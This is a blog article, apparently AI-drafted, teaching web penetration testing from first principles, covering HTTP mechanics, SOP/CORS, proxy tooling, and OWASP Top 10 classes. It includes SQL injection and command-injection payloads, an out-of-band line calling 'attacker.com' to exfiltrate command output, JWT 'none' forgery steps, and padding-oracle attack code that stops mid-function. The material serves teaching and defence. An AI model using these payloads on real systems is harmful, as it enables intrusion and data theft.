Cybersecurity

Dec 11, 2025

web application pentest

The Anatomy of Exploitation: A First-Principles Analysis of Web Architecture and Vulnerability Mechanics

Shubham Khichi

Founder & CEO

1. Introduction: The Philosophy of First Principles in Cybersecurity

At CyberAGI, we are building the foundations of a future in which cybersecurity will be managed by AI agents. To get there, I first want to understand and explain (with the help of AI) how web application security works from first principles. No fancy tooling, just a detailed write-up on why things are the way they are.

Disclaimer: This article was heavily edited by a human but drafted by AI, just like everything in the digital space.

The discipline of offensive security, specifically web penetration testing, is frequently mischaracterized as a practice of tool execution. In the popular imagination, and indeed in the workflow of novice practitioners, the focus often rests on the utilization of automated scanners—software suites designed to identify known patterns of vulnerability. However, a reliance on abstraction layers obscures the fundamental reality of the web: it is a deterministic system governed by specific protocols, architectural decisions, and logical structures. To truly master the art of exploitation, one must abandon the "tool-first" mindset and adopt a "first-principles" approach. This necessitates deconstructing the web into its constituent parts—the raw electrical signals of the network, the text-based conversations of the HTTP protocol, the state machines of databases, and the execution contexts of browsers.

Thinking via first principles requires the analyst to ask not "What tool finds this bug?" but rather "What mechanism allows this bug to exist?" It compels a shift from memorizing exploit payloads to understanding the physics of the targeted system. When a SQL injection occurs, it is not merely a "security flaw"; it is a linguistic failure where an interpreter cannot distinguish between the developer's intended control instructions and the user's supplied data.1 When a Cross-Site Scripting (XSS) payload executes, it is a manifestation of the browser’s trust model—the Same-Origin Policy—being subverted by the injection of an execution context into a presentation layer.

This report provides an exhaustive, granular analysis of web penetration testing through this foundational lens. We will strip away the graphical user interfaces of browsers and testing suites to examine the raw bytes of communication. We will explore the mechanics of the HTTP protocol, the manual manipulation of sockets using foundational tools like curl and netcat, and perform a deep-dive technical dissection of the OWASP Top 10 (2025) vulnerability classes.4 By understanding the root causes—such as how a SQL parser constructs an Abstract Syntax Tree or how an XML processor handles external entities—we establish a methodology that is robust, adaptable, and independent of specific vendor tooling.

2. The Physics of the Web: Protocol Architecture and State

To exploit a web application, the security researcher must first possess an intimate understanding of the medium through which it communicates. The World Wide Web is built upon the Hypertext Transfer Protocol (HTTP), an application-layer protocol that operates over the TCP/IP stack.5 While modern browsers render this communication as seamless multimedia experiences, the underlying reality is a series of discrete, text-based transactions.

2.1 The Anatomy of HTTP: Deconstructing the Conversation

At its core, web penetration testing is the manipulation of text strings sent over a socket. When a user interacts with a web application, the browser acts as a User-Agent, translating user actions into HTTP requests. A first-principles approach requires us to bypass this translation layer and interact directly with the protocol.5

2.1.1 The Request-Response Cycle and Method Semantics

The fundamental unit of web communication is the request-response pair. A client initiates a TCP connection to a server (typically on port 80 or 443) and transmits a text block containing a method, a Uniform Resource Identifier (URI), headers, and an optional body.
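The text block described above can be assembled by hand. The following is a minimal sketch in Python; the function name `build_request`, the host `target.example`, and the form fields are illustrative assumptions, not part of any real application.

```python
def build_request(method, path, host, headers=None, body=b""):
    """Assemble an HTTP/1.1 request as the exact bytes sent on the socket."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        # The server needs the body length to know where the request ends.
        lines.append(f"Content-Length: {len(body)}")
    # An empty line (CRLF CRLF) separates the headers from the optional body.
    head = "\r\n".join(lines) + "\r\n\r\n"
    return head.encode("ascii") + body


# Hypothetical login request used only for illustration.
raw = build_request(
    "POST",
    "/login",
    "target.example",
    {"Content-Type": "application/x-www-form-urlencoded"},
    b"user=alice&pass=secret",
)
print(raw.decode("ascii"))
```

Printing `raw` shows the request line, the headers, the blank separator line, and the body: everything a browser would normally hide.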

The Request Line dictates the intent of the transaction. The HTTP method (or verb) is the primary operator. While GET and POST are ubiquitous, the semantic distinctions between them are critical for security logic. GET requests are designed to retrieve data and should be both safe (they do not change server state) and idempotent (multiple identical requests have the same effect as a single request).7 Vulnerabilities often arise when developers violate these semantic rules. For instance, if a developer allows a state-changing action (like deleting a user) via a GET request, they inadvertently open the door to Cross-Site Request Forgery (CSRF), as GET requests are easily triggered by third-party sites via image tags or links.6

The POST method, conversely, is designed to submit data to be processed to a specified resource. It typically carries a payload in the message body. The format of this body—whether application/x-www-form-urlencoded, multipart/form-data, or application/json—dictates how the server parses the input. Understanding the parser's behavior is key to exploitation; a server expecting JSON might crash or behave unexpectedly if fed XML, potentially revealing stack traces or other sensitive information.7

2.1.2 The Control Plane: HTTP Headers

Headers function as the metadata control plane of the web. They govern caching, content negotiation, authentication, and security policies. From a first-principles perspective, headers are not static requirements but injection vectors and logic toggles.

The Host header, mandatory in HTTP/1.1, specifies the domain name of the server.5 This allows for Virtual Hosting, where a single IP address serves multiple domains. If a server blindly trusts the Host header to generate password reset links or import scripts, it leads to Host Header Injection attacks, where an attacker can poison the cache or redirect users to malicious domains.

Security headers such as Content-Security-Policy (CSP) and X-Frame-Options act as defensive layers instructed by the server but enforced by the browser.8 A penetration tester must analyze these headers to determine the feasibility of client-side attacks. For example, a missing X-Frame-Options header, with no CSP frame-ancestors directive in its place, suggests susceptibility to Clickjacking, while a weak CSP might allow for the execution of inline scripts (XSS).8

2.1.3 The Myth of Stateful Connection

A critical concept in web architecture is that HTTP is inherently stateless. The server retains no memory of previous requests by default.6 To create cohesive applications—such as a shopping cart or a logged-in user area—developers must layer a state management mechanism on top of this stateless protocol.

This is primarily achieved via Session Identifiers, typically stored in Cookies. The security of the entire application often rests on the entropy, generation, and handling of this single string of characters.9 Understanding that "logging in" is simply the exchange of a token allows a tester to realize that bypassing authentication often means stealing, predicting, or forcing this token rather than cracking a password. If the session ID is predictable (e.g., a sequential number), the attacker can hijack sessions by iterating through the sequence. If the application accepts a session ID supplied by the client and keeps it after login (Session Fixation), the attacker can force a victim to use a known ID, thereby gaining access to the victim's authenticated state.10
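To make the predictability point concrete, here is a small sketch contrasting a sequential generator with one backed by the operating system's CSPRNG. The generator `sequential_ids` is a hypothetical stand-in for a weak implementation; `secrets.token_urlsafe` is the standard-library call.

```python
import secrets


def sequential_ids(start):
    """Hypothetical weak generator: each session ID is the previous one plus 1."""
    current = start
    while True:
        current += 1
        yield str(current)


def random_id():
    """Stronger alternative: 32 bytes from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(32)


weak = sequential_ids(1000)
attacker_id = next(weak)            # the attacker logs in and is issued an ID
victim_id = next(weak)              # the victim logs in next
guess = str(int(attacker_id) + 1)   # the attacker increments their own ID
print(guess == victim_id)           # the victim's session ID was guessable
```

With `random_id()`, knowing one issued ID gives no practical help in guessing the next.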

2.2 The Browser Execution Context: The DOM and SOP

On the client side, the browser is not merely a document viewer; it is a complex code execution platform. The Document Object Model (DOM) is the API through which JavaScript interacts with the page structure.3

2.2.1 Same-Origin Policy (SOP)

The cornerstone of web security is the Same-Origin Policy (SOP). This mechanism restricts how a document or script loaded from one origin can interact with a resource from another origin. An origin is defined by the tuple of protocol, domain, and port. Without SOP, a malicious website open in one tab could read the email contents of a webmail service open in another tab.3
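The origin tuple can be sketched in a few lines. This is a simplified model of the comparison, not the browser's actual implementation; the helper names and example URLs are assumptions.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) tuple that identifies an origin."""
    parts = urlsplit(url)
    # When the URL omits the port, the scheme's default port applies.
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)


def same_origin(a, b):
    """Two URLs share an origin only if all three components match."""
    return origin(a) == origin(b)


print(same_origin("https://mail.example.com/inbox", "https://mail.example.com:443/api"))
print(same_origin("https://mail.example.com/inbox", "https://evil.example.com/"))
```

The first comparison matches (same scheme, host, and effective port); the second does not, which is why the second site's scripts cannot read the first site's responses.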

2.2.2 Cross-Origin Resource Sharing (CORS)

Because the modern web requires interaction between different domains (e.g., accessing an API hosted on a different subdomain), Cross-Origin Resource Sharing (CORS) was introduced. CORS uses specific HTTP headers (Access-Control-Allow-Origin) to selectively relax the SOP.12 Exploiting CORS configurations is essentially an attempt to manipulate this trust negotiation. A common misconfiguration involves the null origin. Developers may allow the null origin to support local file testing, but an attacker can trigger a null origin request via a sandboxed iframe, potentially bypassing the restriction and accessing sensitive data if the server reflects the null origin in its response headers.13
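The null-origin misconfiguration can be sketched as a server-side decision about which headers to emit. Both functions below are hypothetical illustrations; the allowlisted origin is an assumed value.

```python
ALLOWED_ORIGINS = {"https://app.example.com"}  # hypothetical allowlist


def cors_headers_reflecting(request_origin):
    """Vulnerable pattern: echo back whatever Origin the client sent, even "null"."""
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
    }


def cors_headers_allowlist(request_origin):
    """Safer pattern: relax the SOP only for origins that are explicitly trusted."""
    if request_origin in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",
        }
    return {}  # no CORS headers: the browser keeps the response unreadable


# A sandboxed iframe sends "Origin: null"; the reflecting server trusts it.
print(cors_headers_reflecting("null"))
print(cors_headers_allowlist("null"))
```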

2.3 The Mechanism of Interception: Man-in-the-Middle

To manipulate web traffic effectively, the penetration tester must interpose themselves between the client and the server. This is the role of the HTTP Proxy.

A proxy server like Burp Suite or OWASP ZAP functions by establishing two distinct TCP connections: one between the browser and the proxy, and another between the proxy and the server.15 This architecture allows the tester to pause, inspect, and modify traffic in transit—a capability impossible with a standard browser.

For encrypted traffic (HTTPS), the proxy must perform TLS Termination. It acts as a Certificate Authority (CA), dynamically generating fake certificates for the target domains. The browser must be configured to trust the proxy's root CA certificate. If this trust is established, the proxy can decrypt the traffic, display it to the tester, re-encrypt it, and forward it to the server.15 This mechanism highlights a critical security principle: the chain of trust. Encryption is only as secure as the integrity of the Certificate Authorities trusted by the client.

3. The Laboratory: Tooling from the Ground Up

This section compares manual tools with automated suites like Burp Suite. To think deeply about pentesting, one must recognize that Burp Suite is essentially an automation and workflow wrapper around basic socket manipulation. A mastery of the underlying manual tools provides the intuition necessary to use complex suites effectively.

3.1 The "First Principles" Toolset: Curl, Netcat, and OpenSSL

Before employing a Graphical User Interface (GUI), an expert must be comfortable communicating with a web server using raw text. This removes the abstraction layer and reveals exactly what is being sent and received, free from the automatic behaviors of modern browsers.

3.1.1 curl – The Protocol Surgeon

curl is the industry standard for constructing HTTP requests via the command line. Unlike a browser, which automatically appends headers like User-Agent, Accept, Referer, and Cookie, curl sends only what is explicitly defined (with minor defaults). This allows a tester to strip a request down to its bare minimum to identify exactly what the server requires to process a transaction.16

  • Header Manipulation: A browser might hide the effects of Virtual Host routing. By using curl -H "Host: internal.admin" http://target.com, a tester can manually probe for internal administrative panels that are routed based on the Host header but reside on the same public-facing IP address.16

  • Verbosity and Debugging: The -v (verbose) flag is indispensable. It reveals the handshake details, the raw request headers, and the raw response headers.17 Analyzing the raw response headers is often the first step in fingerprinting a server. A header reading Server: Apache/2.4.49 instantly alerts a knowledgeable tester to the potential for a Path Traversal vulnerability (CVE-2021-41773).

  • State Management (Cookies): While browsers manage cookies implicitly, curl requires manual intervention. The -c flag (cookie-jar) writes cookies to a file, and the -b flag reads them.18 This manual management reinforces the fundamental concept that a user session is nothing more than a text file containing a token, which must be presented to the server with every request.

  • Data Fidelity: The --data-binary flag allows for the transmission of data exactly as specified, without any processing or stripping of newlines. This is crucial when exploiting vulnerabilities that depend on byte-level precision, such as specific deserialization attacks or request smuggling.20

3.1.2 netcat – Raw Socket Interaction

For an even deeper level of analysis, netcat (nc) allows sending raw bytes to a TCP port.

  • Exercise: Executing nc target.com 80, then typing GET / HTTP/1.1 and Host: target.com on separate lines followed by an empty line, manually demonstrates that HTTP is, at its root, a conversation in text.

  • Strategic Value: This technique is vital when curl or a browser automatically "fixes" a malformed request. In advanced attacks like HTTP Request Smuggling, the attacker intentionally sends malformed headers (e.g., conflicting Content-Length and Transfer-Encoding headers). High-level tools might correct these errors before sending, whereas netcat sends exactly what is typed, allowing the tester to probe the server's parsing logic directly.16
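The same raw-socket exchange can be reproduced with Python's standard `socket` module, which also sends bytes exactly as given. This is a minimal sketch; `send_raw` is an illustrative helper name, and it assumes the server closes the connection after responding (hence the `Connection: close` header).

```python
import socket


def send_raw(host, port, payload, timeout=5.0):
    """Send bytes exactly as given and return everything the server sends back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:  # an empty read means the server closed the connection
                break
            chunks.append(data)
    return b"".join(chunks)


# The request as it would be typed into netcat, including the empty line
# that terminates the headers. Nothing is added, normalized, or "fixed".
REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)
```

A call such as `send_raw("target.com", 80, REQUEST)` would return the raw status line, headers, and body as a single byte string.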

3.1.3 Python – The Automation Engine

When an exploit requires complex logic—such as logging in, extracting a CSRF token from the response, encoding a payload, and sending a second request—curl becomes cumbersome. Python's requests library serves as the bridge between manual testing and automated exploitation.

  • Fuzzing: Writing a simple fuzzer in Python (looping through a wordlist and sending requests) is often more flexible than configuring a commercial tool. It allows for custom error handling, timing delays to avoid rate limits, and logic-based stopping conditions.21

  • First Principles Fuzzing: A basic Python fuzzer demonstrates that vulnerability discovery is often a statistical game of "input vs. expected output." By iterating through 10,000 potential directory names or 5,000 common passwords, the tester is systematically exhausting the chosen wordlist; the search space is covered only as far as the wordlist covers it.23
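A directory fuzzer of the kind described above might look like the sketch below. To stay dependency-free it uses the standard library's `urllib` rather than `requests`; the function names, the `fetch` hook, and the "anything other than 404 is interesting" rule are assumptions chosen for illustration.

```python
import time
import urllib.error
import urllib.request


def http_status(url):
    """Return the HTTP status code for a GET request to url."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 4xx/5xx responses arrive as exceptions


def fuzz_paths(base_url, wordlist, fetch=http_status, delay=0.0, stop_after=None):
    """Request base_url/<word> for each word and collect non-404 responses."""
    hits = []
    for word in wordlist:
        url = f"{base_url.rstrip('/')}/{word}"
        status = fetch(url)
        if status != 404:
            hits.append((url, status))
            # Logic-based stopping condition: quit after enough findings.
            if stop_after is not None and len(hits) >= stop_after:
                break
        time.sleep(delay)  # timing delay to stay under rate limits
    return hits
```

Passing a custom `fetch` callable makes the loop easy to dry-run without touching the network, for example `fuzz_paths("http://t.example", ["a", "admin"], fetch=lambda u: 404)`.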

3.2 Burp Suite: The Architect's Workbench

Burp Suite is the industry standard not because it performs magic, but because it optimizes the workflow of interception, modification, and analysis.24 It aggregates the functionalities of curl, netcat, and Python scripts into a cohesive interface.

3.2.1 Proxy & Intercept

The Proxy component pauses the request "in flight." It allows the human analyst to modify data after the browser generates it but before the server processes it.24

  • Usage Principle: This is critical for bypassing client-side validation. A web form might use JavaScript to prevent a user from entering a negative price for a product. However, the server processes the HTTP request, not the JavaScript form. By intercepting the request and changing the price to -1.00, the tester proves that client-side validation is a User Experience (UX) feature, not a security control.

  • Configuration: The Proxy listener typically runs on 127.0.0.1:8080. The tester must configure the browser to route traffic through this address. This establishes the MITM position described in Section 2.3.25

3.2.2 Repeater: The Iterative Probe

Repeater is the GUI equivalent of curl. It allows for the iterative modification and re-transmission of a single request.

  • Workflow: When a potentially interesting behavior is observed (e.g., a specific error message or a timing delay), the request is sent to Repeater. The tester then "fuzzes" the parameters manually—changing a single quote to a double quote, adding a logic operator, or changing an ID—to observe the server's specific response in isolation.24 This isolation is key to the scientific method of debugging and exploitation.

3.2.3 Intruder: The Fuzzing Engine

Intruder automates the work of Repeater. It is essentially a configurable for loop wrapping an HTTP request.

  • Attack Types:

    • Sniper: Replaces a single payload position with a list of values. Ideal for parameter fuzzing (e.g., checking one input field for XSS).

    • Battering Ram: Places the same payload into multiple positions simultaneously.

    • Pitchfork: Iterates through multiple payload sets simultaneously (e.g., testing a list of usernames with a corresponding list of passwords).

    • Cluster Bomb: Iterates through every combination of multiple payload sets (e.g., every username with every password). This is computationally expensive but exhaustive.24
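The four attack types reduce to four ways of iterating over payloads. The generators below are a sketch of that idea, not Burp Suite's implementation; each yielded tuple stands for the values placed into the request's payload positions.

```python
from itertools import product


def sniper(base, payloads):
    """One position at a time; the other positions keep their base values."""
    for i in range(len(base)):
        for p in payloads:
            yield tuple(p if j == i else v for j, v in enumerate(base))


def battering_ram(base, payloads):
    """The same payload in every position at once."""
    for p in payloads:
        yield tuple(p for _ in base)


def pitchfork(*payload_sets):
    """Walk the payload sets in lockstep: first with first, second with second."""
    yield from zip(*payload_sets)


def cluster_bomb(*payload_sets):
    """Every combination of the payload sets (the Cartesian product)."""
    yield from product(*payload_sets)


users = ["alice", "bob"]
passwords = ["123456", "letmein"]
print(list(pitchfork(users, passwords)))     # 2 requests
print(list(cluster_bomb(users, passwords)))  # 2 x 2 = 4 requests
```

The request count explains the cost: Pitchfork grows with the shortest list, while Cluster Bomb grows with the product of all list lengths.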

4. Vulnerability Class Deep Dives: The OWASP Top 10 (2025)

The 2025 iteration of the OWASP Top 10 reflects a shift toward identifying root causes rather than just symptoms.4 We will now dissect these vulnerabilities, moving from their architectural origins to detection and exploitation.

4.1 Broken Access Control (A01:2025)

Broken Access Control remains the most prevalent web vulnerability because it relies heavily on business logic, which automated scanners struggle to interpret contextually.4

4.1.1 Root Cause: The Failure of Authorization Logic

Authentication answers the question "Who are you?", while Authorization answers "What are you allowed to do?". Broken Access Control occurs when the server fails to verify the latter on every request, often relying on the client to hide unauthorized functions or assuming that knowing a resource's ID implies permission to access it.

Insecure Direct Object References (IDOR) are a prime example. This vulnerability arises when an application uses a user-supplied input (like a database key or filename) to access an object directly without an access control check.29 The root cause is the decoupling of the object reference from the session's permission set. The server sees "Request for Object 123" and fulfills it, ignoring the fact that "User A" (the requester) does not own "Object 123."

4.1.2 Exploitation Mechanics

  • Target Identification: The tester looks for exposed references in URLs, cookies, or API parameters (e.g., id=1234, account_number=5555, file=report.pdf).30

  • Manual Exploitation (The "Change-One-Digit" Test):

    1. Baseline: Log in as User A and retrieve a resource: GET /api/invoices?id=100.

    2. Hypothesis: If the system is stateless and checks only authentication (who I am) but not authorization (what I own), requesting id=101 (User B's invoice) should succeed.

    3. Execution (curl): curl -b "session=..." "https://api.site.com/invoices?id=101" (the URL is quoted so the shell does not interpret the ? character).

    4. Analysis: If the server returns a 200 OK with data instead of a 403 Forbidden, the vulnerability is confirmed.

  • Burp Suite Workflow:

    1. Capture the legitimate request in Proxy.

    2. Send to Intruder.

    3. Define the ID parameter as the payload position.

    4. Use a "Numbers" payload type (Sequential) to iterate from the known ID to neighboring IDs.

    5. Analysis: Filter results by Content-Length. A successful IDOR often results in a different response size compared to a "Not Found" or "Forbidden" error.26
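The root cause behind the "Change-One-Digit" test can be sketched as two versions of the same handler. The in-memory `INVOICES` store, the user names, and the handler names are hypothetical; the point is the single ownership check that separates them.

```python
# Hypothetical data store: invoice ID -> record with an owner.
INVOICES = {
    100: {"owner": "alice", "total": 42},
    101: {"owner": "bob", "total": 99},
}


def get_invoice_vulnerable(session_user, invoice_id):
    """Authenticated, but never asks whether session_user owns the invoice."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return 404, None
    return 200, invoice


def get_invoice_checked(session_user, invoice_id):
    """Ties the object reference back to the session's permissions."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None:
        return 404, None
    if invoice["owner"] != session_user:
        return 403, None
    return 200, invoice


# Alice changes id=100 to id=101.
print(get_invoice_vulnerable("alice", 101))  # Bob's invoice is returned
print(get_invoice_checked("alice", 101))     # request is refused
```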

4.1.3 Privilege Escalation

This class also encompasses Privilege Escalation, which can be categorized as:

  • Horizontal: Accessing the data of peers (e.g., IDOR).31

  • Vertical: Accessing functionality of higher-tier roles (e.g., User accessing Admin functions).

  • Mass Assignment: A modern variant common in API-driven apps. If a user profile update sends a JSON object {"username": "user", "role": "user"}, the attacker can intercept the request and modify it to {"role": "admin"}. If the backend framework binds this input directly to the internal user model without filtering, the role is updated, bypassing the intended logic.32
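Mass Assignment comes down to how request fields are bound to the stored model. A minimal sketch, assuming a user record held in a plain dictionary and hypothetical function and field names:

```python
EDITABLE_FIELDS = {"username", "email"}  # hypothetical allowlist


def update_profile_naive(user, submitted):
    """Binds every submitted field to the model, including ones the form never showed."""
    user.update(submitted)
    return user


def update_profile_allowlist(user, submitted):
    """Copies only the fields a user is permitted to edit."""
    for field in EDITABLE_FIELDS:
        if field in submitted:
            user[field] = submitted[field]
    return user


tampered = {"username": "user", "role": "admin"}  # attacker-modified JSON body
print(update_profile_naive({"username": "user", "role": "user"}, tampered))
print(update_profile_allowlist({"username": "user", "role": "user"}, tampered))
```

In the naive version the role becomes `admin`; in the allowlist version it stays `user` because `role` is never copied.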

4.2 Injection Vulnerabilities (A05:2025)

Injection flaws occur when untrusted user data is sent to an interpreter as part of a command or query. The interpreter, lacking context, cannot distinguish between the code (the developer's query instructions) and the data (the user's input).2

4.2.1 SQL Injection (SQLi)

  • First Principles - The Parser: A database engine parses a SQL query into an Abstract Syntax Tree (AST) before execution. When a query is constructed via string concatenation (e.g., "SELECT * FROM users WHERE name = '" + userInput + "'"), the developer intends userInput to be a leaf node (a literal string) in the AST. However, if the input contains specific characters like ' OR 1=1 --, the parser interprets the quote as a delimiter, closing the string node and interpreting the subsequent characters as logic nodes in the tree.1

  • Exploitation Methodology:

    1. Detection (Syntax Breaking): Send a single quote '. If the server returns a 500 Internal Server Error or a database syntax error, it indicates that the input successfully broke the query structure and corrupted the AST.34

    2. Boolean-Blind (Logic Inference): If errors are suppressed, the tester must infer the query structure by asking the database True/False questions.

      • Payload A: id=1' AND '1'='1 (Logically True). Result: Page loads normally.

      • Payload B: id=1' AND '1'='2 (Logically False). Result: Page is missing data or empty.

      • Conclusion: The input is being evaluated as logic.35

    3. Union-Based (Data Extraction): The UNION operator allows combining the results of two queries. The attacker appends UNION SELECT to the original query to retrieve data from other tables (e.g., passwords). This requires the injected query to match the column count and data types of the original query.34
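The difference between input that becomes part of the query's structure and input that stays a literal can be reproduced with Python's built-in `sqlite3` module. The table, rows, and function names below are made up for the demonstration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "a-secret"), ("bob", "b-secret")],
)


def find_user_concat(name):
    """Vulnerable: the input is spliced into the SQL text before parsing."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_param(name):
    """Safe: the query is parsed first; the input is bound as a literal value."""
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()


tautology = "' OR 1=1 --"
union = "' UNION SELECT secret FROM users --"

print(find_user_concat(tautology))  # every row matches
print(find_user_concat(union))      # data from another column leaks
print(find_user_param(tautology))   # no user has this literal name
```

The parameterized version returns nothing for either payload, because the quote never reaches the parser as syntax.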

4.2.2 OS Command Injection

  • Root Cause: This occurs when an application passes unsafe user data to a system shell (like /bin/sh or cmd.exe) using functions like system(), exec(), or Runtime.exec(). Shells use metacharacters (&, |, ;, $(), `) to chain multiple commands together.36

  • Exploitation:

    • Scenario: A web interface for a network diagnostic tool that runs ping [IP].

    • Attack: Input 127.0.0.1; cat /etc/passwd.

    • Mechanism: The shell sees the semicolon as a command separator. It executes ping 127.0.0.1 successfully, and then immediately executes cat /etc/passwd, returning the output of both to the user.36

  • Out-of-Band (OAST): In "Blind" scenarios where the application does not return the command output, the tester must force the server to connect back to a controlled system.

    • Payload: ; curl http://attacker.com/$(whoami) or ; nslookup $(whoami).attacker.com.

    • Mechanism: The shell executes the command, resolves the DNS name containing the result of whoami, and the attacker sees the result in their DNS server logs.39
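The semicolon mechanism can be demonstrated harmlessly by substituting `echo` for `ping` and a second `echo` for the injected command. This sketch assumes a POSIX system with `echo` available; the function names are illustrative.

```python
import subprocess


def echo_via_shell(user_input):
    """Vulnerable pattern: the input is spliced into a string parsed by the shell."""
    result = subprocess.run(
        "echo " + user_input, shell=True, capture_output=True, text=True
    )
    return result.stdout


def echo_via_argv(user_input):
    """Safer pattern: no shell; the input is passed as a single argument."""
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout


payload = "127.0.0.1; echo INJECTED"
print(echo_via_shell(payload))  # two commands ran: the output has two lines
print(echo_via_argv(payload))   # one command ran: the semicolon is plain text
```

Without a shell in the path there is nothing to interpret the metacharacters, so the payload is printed back as data.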

4.3 Cryptographic Failures (A04:2025)

This category focuses on failures related to data protection in transit and at rest. A critical area relevant to web testing is the misuse of cryptographic signatures in JSON Web Tokens (JWT) and padding oracles.4

4.3.1 JSON Web Token (JWT) Vulnerabilities

  • Architecture: A JWT is a self-contained token structure comprising a Header, Payload, and Signature, separated by dots. The signature is generated using a secret key to ensure integrity. Vulnerabilities arise when the library or implementation fails to verify this signature correctly.40

  • The "None" Algorithm: The JWT specifications define a "none" algorithm for unsecured tokens, which signifies that the token carries no signature. If a server's JWT library accepts this algorithm by default, an attacker can trivially bypass authentication.

    • Exploitation Steps:

      1. Decode the JWT Header (Base64Url).

      2. Modify the header to {"alg": "none", "typ": "JWT"}.

      3. Modify the payload to elevate privileges (e.g., "role": "admin").

      4. Remove the signature bytes (leaving the trailing dot).

      5. Send the forged token. The server, seeing "none", skips signature verification and accepts the admin claim.41

  • Algorithm Confusion (RS256 to HS256): If a server expects an RSA (asymmetric) signature but the attacker forces HMAC (symmetric) via the header, the server might use its public key as the secret key for HMAC verification. Since the public key is public, the attacker can sign their own tokens.42
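The "none" bypass can be reproduced with a toy verifier built from the standard library. This is a sketch, not a real JWT library: `verify_naive` models a verifier that trusts the token's own `alg` field, `verify_strict` pins the expected algorithm, and the secret and claims are invented.

```python
import base64
import hashlib
import hmac
import json


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(payload, secret):
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def hs256_valid(token, secret):
    head, body, sig = token.split(".")
    expected = hmac.new(secret, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def verify_naive(token, secret):
    """Vulnerable: lets the token itself decide whether a signature is needed."""
    head, body, _ = token.split(".")
    alg = json.loads(b64url_decode(head))["alg"]
    if alg == "none" or hs256_valid(token, secret):
        return json.loads(b64url_decode(body))
    raise ValueError("invalid signature")


def verify_strict(token, secret):
    """Pins the algorithm the server expects before checking the signature."""
    head, body, _ = token.split(".")
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    if not hs256_valid(token, secret):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(body))


SECRET = b"server-side-secret"  # hypothetical key, unknown to the attacker
legit = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
# Forged token: alg "none", elevated role, empty signature after the trailing dot.
forged = (
    encode_part({"alg": "none", "typ": "JWT"})
    + "."
    + encode_part({"sub": "alice", "role": "admin"})
    + "."
)
print(verify_naive(forged, SECRET))
```

The naive verifier returns the admin claims without ever touching the secret, while `verify_strict(forged, SECRET)` raises `ValueError`.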

4.3.2 Padding Oracle Attacks

  • Physics of the Flaw: In Cipher Block Chaining (CBC) mode, decryption involves XORing the output of the decryption function with the previous ciphertext block to recover the plaintext. This creates a dependency chain. Padding (PKCS#7) is added to ensure the data fits the block size.43

  • The Oracle: If a server reveals whether the padding of a decrypted message is valid or invalid (via a distinct error message or a timing difference), it acts as an "Oracle."

  • Exploitation: An attacker can manipulate the ciphertext byte-by-byte. By observing the Oracle's response (Valid/Invalid Padding), the attacker can mathematically deduce the intermediate state of the decryption and recover the plaintext without ever knowing the encryption key. This demonstrates that cryptography is fragile; leaking a single bit of information (validity of padding) can compromise the entire confidentiality of the message.44
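The byte-by-byte deduction can be shown end to end with a toy setup. In the sketch below the block cipher is a deliberately trivial XOR stand-in (an assumption made to avoid external dependencies, and not secure); the attack code never touches the key and only calls the oracle.

```python
import os

BLOCK = 16
KEY = os.urandom(BLOCK)  # known only to the "server" functions below


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_encrypt(block):
    # Stand-in for a real block cipher such as AES. NOT secure.
    return xor(block, KEY)


toy_block_decrypt = toy_block_encrypt  # XOR is its own inverse


def cbc_encrypt(plaintext, iv):
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n  # PKCS#7 padding
    prev, out = iv, []
    for i in range(0, len(padded), BLOCK):
        prev = toy_block_encrypt(xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def padding_oracle(prev, block):
    """Server side: reveals only whether the decrypted block has valid padding."""
    plain = xor(toy_block_decrypt(block), prev)
    n = plain[-1]
    return 1 <= n <= BLOCK and plain.endswith(bytes([n]) * n)


def recover_block(prev, block, oracle):
    """Attacker side: recover one plaintext block using only the oracle."""
    intermediate = bytearray(BLOCK)  # decrypt(block) before the CBC XOR
    for pad in range(1, BLOCK + 1):
        pos = BLOCK - pad
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = intermediate[j] ^ pad  # force known bytes to equal pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), block):
                continue
            if pad == 1:
                # Rule out accidental longer paddings such as 0x02 0x02.
                forged[pos - 1] ^= 1
                still_valid = oracle(bytes(forged), block)
                forged[pos - 1] ^= 1
                if not still_valid:
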